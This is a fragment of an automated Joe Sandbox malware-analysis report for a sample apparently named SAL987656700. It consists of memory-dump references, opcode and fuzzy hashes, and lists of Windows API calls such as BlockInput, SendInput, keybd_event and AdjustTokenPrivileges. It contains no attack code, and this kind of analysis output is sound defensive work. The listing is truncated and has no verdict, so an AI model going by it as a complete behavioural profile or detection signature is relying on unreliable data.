                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                      • String ID:
                                      • API String ID: 3429775523-0
                                      • Opcode ID: a5c5bdfe66946985e0f280c1a2872c9cd1151d7ee829eed423e215df733d5b83
                                      • Instruction ID: aa4c5b3b46f3830d75c287641ced63e6ffb850eeaec2ad30b209f7bc22a3986c
                                      • Opcode Fuzzy Hash: a5c5bdfe66946985e0f280c1a2872c9cd1151d7ee829eed423e215df733d5b83
                                      • Instruction Fuzzy Hash: 3EF0F4B1A90309FBDF00DFE49C89EAEBBBCFB08604F508565E501E2191E774AA449A50
                                      APIs
                                      • GetCurrentProcess.KERNEL32(008B28E9,?,008A4CBE,008B28E9,009488B8,0000000C,008A4E15,008B28E9,00000002,00000000,?,008B28E9), ref: 008A4D09
                                      • TerminateProcess.KERNEL32(00000000,?,008A4CBE,008B28E9,009488B8,0000000C,008A4E15,008B28E9,00000002,00000000,?,008B28E9), ref: 008A4D10
                                      • ExitProcess.KERNEL32 ref: 008A4D22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: 301272f74f2cbb7af78f7c33410a2fcb76987c0b24a4c2e7ab5cf04c060239c0
                                      • Instruction ID: 9d2787c340cdcf857163db68a9ea59a646fe84361be19f9af7ee43761970f64d
                                      • Opcode Fuzzy Hash: 301272f74f2cbb7af78f7c33410a2fcb76987c0b24a4c2e7ab5cf04c060239c0
                                      • Instruction Fuzzy Hash: E0E0B671154148ABDF11AF58DE09A987B69FB82785B108014FD15CA632DB75DE42EB80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /
                                      • API String ID: 0-2043925204
                                      • Opcode ID: 6c93c7510dbd160a881d45fb52be4ac385dc986e3f31ad181121736a3e7dd023
                                      • Instruction ID: ea24f4290d8f22613c6b1c62193a3db08cc46bc8044659c0b3283fca963ee6fb
                                      • Opcode Fuzzy Hash: 6c93c7510dbd160a881d45fb52be4ac385dc986e3f31ad181121736a3e7dd023
                                      • Instruction Fuzzy Hash: 88412676900619AFCB209FB9CC89EFB7BB8FB84314F504269F915D7380E6709E818B54
                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?), ref: 008DD28C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: NameUser
                                      • String ID: X64
                                      • API String ID: 2645101109-893830106
                                      • Opcode ID: 5dee592191d317b77f2b31bbf99cf381c99b4381dfbe6afbc52007109d0b2164
                                      • Instruction ID: 40330c672fad80cbfe8036401ead0e2761d6662adafe0a0c7218ac6837448000
                                      • Opcode Fuzzy Hash: 5dee592191d317b77f2b31bbf99cf381c99b4381dfbe6afbc52007109d0b2164
                                      • Instruction Fuzzy Hash: 52D0CAB581522DEACF94DBA0EC88DDAB3BCFB08349F104292F146E2100DB30A6489F20
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                      • Instruction ID: 0ce93bf9f9326e47cdd5d501d520aa076e36fa06db0e224c3193bb396b89134e
                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                      • Instruction Fuzzy Hash: 5E020B71E002199FEF14CFA9C8806ADFBF1FF49324F25816AD919E7784D731AA418B94
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                        • Part of subcall function 00899944: GetWindowLongW.USER32(?,000000EB), ref: 00899952
                                      • GetParent.USER32(?), ref: 008D73A3
                                      • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?), ref: 008D742D
                                      Similarity
                                      • API ID: LongWindow$DialogNtdllParentProc_
                                      • String ID:
                                      • API String ID: 314495775-0
                                      • Opcode ID: 20ab15867a119e9d856ab9818ac670c3fd2046ced03465ca83911cb7075ae725
                                      • Instruction ID: 9cd80f1c08279dda4acd23215838eb0d38d9f6f1c965b9848bd2093f4f84d428
                                      • Opcode Fuzzy Hash: 20ab15867a119e9d856ab9818ac670c3fd2046ced03465ca83911cb7075ae725
                                      • Instruction Fuzzy Hash: 7921A270604104AFCF25AF2DCC59AA93B96FF0A3B4F08436AF9659B3A1D3319D51E740
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 008F6918
                                      • FindClose.KERNEL32(00000000), ref: 008F6961
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      • Opcode ID: 1f7b5ab1c94a59c0549ef490ad328466b2d48a9a29199533e5927650a6477e65
                                      • Instruction ID: 08176e3aeac320c28ae5700d1734252601c28fe4277d4e21a2804d5ad28d1d00
                                      • Opcode Fuzzy Hash: 1f7b5ab1c94a59c0549ef490ad328466b2d48a9a29199533e5927650a6477e65
                                      • Instruction Fuzzy Hash: E811D0716142049FD710DF29D484A26BBE0FF84328F14C699E569CF2A2DB70EC05CB91
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,008D769C,?,?,?), ref: 00919111
                                        • Part of subcall function 00899944: GetWindowLongW.USER32(?,000000EB), ref: 00899952
                                      • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 009190F7
                                      Similarity
                                      • API ID: LongWindow$DialogMessageNtdllProc_Send
                                      • String ID:
                                      • API String ID: 1273190321-0
                                      • Opcode ID: 0b95fac5eb0a57ea08af9c752fb6e084b87475a3fcbefcbb421b40fa2ef96db6
                                      • Instruction ID: 2b6dbdeaecb11ac2ca5ecd1588c038069ce4d04013c10ef1b144811883a5d9e2
                                      • Opcode Fuzzy Hash: 0b95fac5eb0a57ea08af9c752fb6e084b87475a3fcbefcbb421b40fa2ef96db6
                                      • Instruction Fuzzy Hash: 9401B130208218BBDB219F28DC69FE63BA6FB85365F140428F9520A2E1C7326C81DB51
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00904891,?,?,00000035,?), ref: 008F37E4
                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00904891,?,?,00000035,?), ref: 008F37F4
                                      Similarity
                                      • API ID: ErrorFormatLastMessage
                                      • String ID:
                                      • API String ID: 3479602957-0
                                      • Opcode ID: 1b62182c6636a1bb8b3399f7a122bbc185a309bdd107c7bed99e2233a530b581
                                      • Instruction ID: 3e52171aadedbe7ff31ea2f9815e941a66e6157a6e239e9c68c4cd21adac96c4
                                      • Opcode Fuzzy Hash: 1b62182c6636a1bb8b3399f7a122bbc185a309bdd107c7bed99e2233a530b581
                                      • Instruction Fuzzy Hash: D3F0ECB07042192AD71027755C4DFEB36AEFFC5761F000175F505D2281D9709944C7B1
                                      APIs
                                      • ClientToScreen.USER32(?,?), ref: 00919423
                                      • NtdllDialogWndProc_W.NTDLL(?,00000200,?,00000000,?,?,00000000,00000000,?,008D776C,?,?,?,?,?), ref: 0091944C
                                      Similarity
                                      • API ID: ClientDialogNtdllProc_Screen
                                      • String ID:
                                      • API String ID: 3420055661-0
                                      • Opcode ID: b8dcf6fb8404f14d76dea7898da9ce139af0288bbdd9c884f726276784a83779
                                      • Instruction ID: c7f9e076288ea0368506507edd49f8d38862cbd8fd97d823e3d886af0772b22d
                                      • Opcode Fuzzy Hash: b8dcf6fb8404f14d76dea7898da9ce139af0288bbdd9c884f726276784a83779
                                      • Instruction Fuzzy Hash: 02F03AB2514228FFEF048F51DC09EEE7FB9EB44352F00405AF905A2160D375AA50EBA0
                                      APIs
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 008EB25D
                                      • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 008EB270
                                      Similarity
                                      • API ID: InputSendkeybd_event
                                      • String ID:
                                      • API String ID: 3536248340-0
                                      • Opcode ID: ee7dd6bf1d6b6ba94a72473cc98a9dc494f0d887aeaeb1cd915c3b0d3a525ad3
                                      • Instruction ID: 569c15071ecd1d9347f130281b0facfc032733cd5f6ddf3cfda38d472d88dc6f
                                      • Opcode Fuzzy Hash: ee7dd6bf1d6b6ba94a72473cc98a9dc494f0d887aeaeb1cd915c3b0d3a525ad3
                                      • Instruction Fuzzy Hash: F0F01D7195428DABDB059FA1C805BEE7BB4FF05309F008009F965A6191C3799611DF94
                                      APIs
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008E11FC), ref: 008E10D4
                                      • CloseHandle.KERNEL32(?,?,008E11FC), ref: 008E10E9
                                      Similarity
                                      • API ID: AdjustCloseHandlePrivilegesToken
                                      • String ID:
                                      • API String ID: 81990902-0
                                      • Opcode ID: e9b614f681aa0031153f9868014ca2948d062cbccca0f5fa8a1b42a02ef411a2
                                      • Instruction ID: 176654d3e38cd87add79cb42f04e44adf7559913205126db5e37f16a0799ace8
                                      • Opcode Fuzzy Hash: e9b614f681aa0031153f9868014ca2948d062cbccca0f5fa8a1b42a02ef411a2
                                      • Instruction Fuzzy Hash: A2E0BF72158610AFEB292B55FC09EB777A9FB05310B24C82DF5A5C44B1DB626C90EB50
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EC), ref: 00919542
                                      • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,008D76FB,?,?,?,?), ref: 0091956C
                                      Similarity
                                      • API ID: DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 2065330234-0
                                      • Opcode ID: 6f9bf06c8a49402e552397edaa7e1a0abff9ae7696adf673d2b8ed900c6d0e7f
                                      • Instruction ID: c15b25a799b6c22081c35552925fdce6fa587d32581ddc2476edc69b38fefd21
                                      • Opcode Fuzzy Hash: 6f9bf06c8a49402e552397edaa7e1a0abff9ae7696adf673d2b8ed900c6d0e7f
                                      • Instruction Fuzzy Hash: BCE08CB0248218BBFB190F19DC1AFF93B19EB00BA1F508515FD57A80E1D7B199D0E260
                                      Strings
                                      • Variable is not of type 'Object'., xrefs: 008D0C40
                                      Similarity
                                      • API ID:
                                      • String ID: Variable is not of type 'Object'.
                                      • API String ID: 0-1840281001
                                      • Opcode ID: 7ee8689e5cb0822656fb890b28e6a22e401a191878dde8bf415f8b5e64aa1c2f
                                      • Instruction ID: df42a9fdfd91e18184f47fafb062832774c0b6fab6c4ecdf20cb791fa0764b5d
                                      • Opcode Fuzzy Hash: 7ee8689e5cb0822656fb890b28e6a22e401a191878dde8bf415f8b5e64aa1c2f
                                      • Instruction Fuzzy Hash: A3329870900218DBDF14EF94D980BEDB7B5FF05308F24816AE806EB286DB75AE45CB61
                                      APIs
                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008B6766,?,?,00000008,?,?,008BFEFE,00000000), ref: 008B6998
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID:
                                      • API String ID: 3997070919-0
                                      • Opcode ID: 6f9f692a591161575231d6b4686b013a9685251cbfe8dc9ba5e393555173a5b9
                                      • Instruction ID: bba63be7f02e12d711eb785fab31920bef63e0d98fb95b8969edf07c0f693e64
                                      • Opcode Fuzzy Hash: 6f9f692a591161575231d6b4686b013a9685251cbfe8dc9ba5e393555173a5b9
                                      • Instruction Fuzzy Hash: 57B16E31610609DFDB15CF28C486BA57BE0FF05364F298658E899CF3A2D739E9A1CB40
                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: 174ac041882e20815f27587a9a3b7bd805a681b4773ffdd73019ff9f5ce14abc
                                      • Instruction ID: 1e9c95263d394f490fdd16ae68b527e7c296a8f11264d94a6170fb03d07ffab9
                                      • Opcode Fuzzy Hash: 174ac041882e20815f27587a9a3b7bd805a681b4773ffdd73019ff9f5ce14abc
                                      • Instruction Fuzzy Hash: BE125C71A00229DBCF24DF58D9816EEB7B5FF48710F1481AAE849EB351DB309A81DF94
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 0091A38F
                                      Similarity
                                      • API ID: DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 2065330234-0
                                      • Opcode ID: 034b0f830b11188446d855dc796734d4ba7b2b97c16927a42ed6f5dba5529964
                                      • Instruction ID: 90c531c13232f33785d677f606bc82cf203187bfa7907a745f4f01da7dad85d5
                                      • Opcode Fuzzy Hash: 034b0f830b11188446d855dc796734d4ba7b2b97c16927a42ed6f5dba5529964
                                      • Instruction Fuzzy Hash: D01103303093196AFB296B2CCC15BFD3658DB81760F248224FA614A1E1C7644DC2E296
                                      APIs
                                        • Part of subcall function 00899944: GetWindowLongW.USER32(?,000000EB), ref: 00899952
                                      • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 009187F3
                                      Similarity
                                      • API ID: Window$CallLongProc
                                      • String ID:
                                      • API String ID: 4084987330-0
                                      • Opcode ID: 5df64cb507bc2c2f78a498bdac1241650a84bb5e17e3b578b581f37c7d029ef1
                                      • Instruction ID: 3c8befef23adbdf633a7cb817976a53954c185c4c65088400da910f0a810ba0c
                                      • Opcode Fuzzy Hash: 5df64cb507bc2c2f78a498bdac1241650a84bb5e17e3b578b581f37c7d029ef1
                                      • Instruction Fuzzy Hash: 2AF0FF3120810CEFCF15AF55EC54DFA3BAAEB09360B548554F9655A5A1CB32ACA0FB50
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                        • Part of subcall function 0089912D: GetCursorPos.USER32(?), ref: 00899141
                                        • Part of subcall function 0089912D: ScreenToClient.USER32(00000000,?), ref: 0089915E
                                        • Part of subcall function 0089912D: GetAsyncKeyState.USER32(00000001), ref: 00899183
                                        • Part of subcall function 0089912D: GetAsyncKeyState.USER32(00000002), ref: 0089919D
                                      • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,008D7818,?,?,?,?,?,00000001,?), ref: 00918AF8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                      • String ID:
                                      • API String ID: 2356834413-0
                                      • Opcode ID: 3f9ab94aaf8cb221f262e3f75db0e251a206680bd4ae643c17d0e1b3fcd75c14
                                      • Instruction ID: 66a934d08b8ff8c2e8c3ef73b9b3c1ee9095e01c05c816bd468592d5c4882afd
                                      • Opcode Fuzzy Hash: 3f9ab94aaf8cb221f262e3f75db0e251a206680bd4ae643c17d0e1b3fcd75c14
                                      • Instruction Fuzzy Hash: E3F08270240229ABEF146F19D81AAFE3F65FB007A1F004015F9161A191DBB699E0EBE5
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?), ref: 00899096
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 2065330234-0
                                      • Opcode ID: 2526c21e7395a20d999dc8efef88792edf84b464d1bf3177b7fa9e32439347dd
                                      • Instruction ID: 7011d29b6bb2353ff4bca7de454455bf008deaa7df645cb10b6d4023864a857d
                                      • Opcode Fuzzy Hash: 2526c21e7395a20d999dc8efef88792edf84b464d1bf3177b7fa9e32439347dd
                                      • Instruction Fuzzy Hash: 96F082306043189FDF28DF1AD865B763BA2FB41361F24811CF9624B2E0C73399A1EB60
                                      APIs
                                      • BlockInput.USER32(00000001), ref: 008FEABD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: BlockInput
                                      • String ID:
                                      • API String ID: 3456056419-0
                                      • Opcode ID: 8e6dc47841f4eb7731039399e22d8c498a10928516a3b7f8cc0c54cfa2b79f74
                                      • Instruction ID: 49a23df17d3d323da0424709288e838f75ee04c0f3faf8baddf07c96fb18bea3
                                      • Opcode Fuzzy Hash: 8e6dc47841f4eb7731039399e22d8c498a10928516a3b7f8cc0c54cfa2b79f74
                                      • Instruction Fuzzy Hash: F0E01A712102189FD710EF69D804E9ABBE9FFA8764F008416FD49C7261DAB0A8408BA1
                                      APIs
                                      • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 009193C0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: DialogNtdllProc_
                                      • String ID:
                                      • API String ID: 3239928679-0
                                      • Opcode ID: 3a505744ff969ad2e9eab78d347c41ccdc6e41bf061cbb76fc7bc2abe70576e9
                                      • Instruction ID: f5c1e6cd8d9914defc6569a2351791b666066ad9ee4c8d83013ccc9632c907c7
                                      • Opcode Fuzzy Hash: 3a505744ff969ad2e9eab78d347c41ccdc6e41bf061cbb76fc7bc2abe70576e9
                                      • Instruction Fuzzy Hash: 96F09231248358BFDB21DF58DC15FC63BA5EB06360F044448FA25672E1CB7179A0E7A0
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 008990D5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 2065330234-0
                                      • Opcode ID: 0425d9a31815e5a1b15b29c3403b8d58ad80da0a2c60484f20c5b95fb73e2ec5
                                      • Instruction ID: 91adea09c4f9c3eec1a836dcf379a330b40777fe3cd8b68041eb1b02a6447e09
                                      • Opcode Fuzzy Hash: 0425d9a31815e5a1b15b29c3403b8d58ad80da0a2c60484f20c5b95fb73e2ec5
                                      • Instruction Fuzzy Hash: 74E0C230244304FBCF14AF98DC11F643B2BFB48361F108008FA554A2A1CB33A9A1EB10
                                      APIs
                                      • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,008D7723,?,?,?,?,?,?), ref: 009193F6
                                        • Part of subcall function 00918172: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00953018,0095305C), ref: 009181BF
                                        • Part of subcall function 00918172: CloseHandle.KERNEL32 ref: 009181D1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CloseCreateDialogHandleNtdllProc_Process
                                      • String ID:
                                      • API String ID: 4178364262-0
                                      • Opcode ID: 2da6952aa877da55ffe7535af05148d956f71bfc815d388424d66f7e66d94db8
                                      • Instruction ID: 3d3c09acb298161b498df7626fb3ec9086f3d6a27888955858002f7956b48eb4
                                      • Opcode Fuzzy Hash: 2da6952aa877da55ffe7535af05148d956f71bfc815d388424d66f7e66d94db8
                                      • Instruction Fuzzy Hash: BCE04632258208EFCB01AF04EC60EC63B76FB08351F004004FA21172B2CB32A9A1EF10
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                        • Part of subcall function 00898BCD: DestroyWindow.USER32(?), ref: 00898C81
                                        • Part of subcall function 00898BCD: KillTimer.USER32(00000000,?,?,?,?,00898BBA,00000000,?), ref: 00898D1B
                                      • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?), ref: 00898BC3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
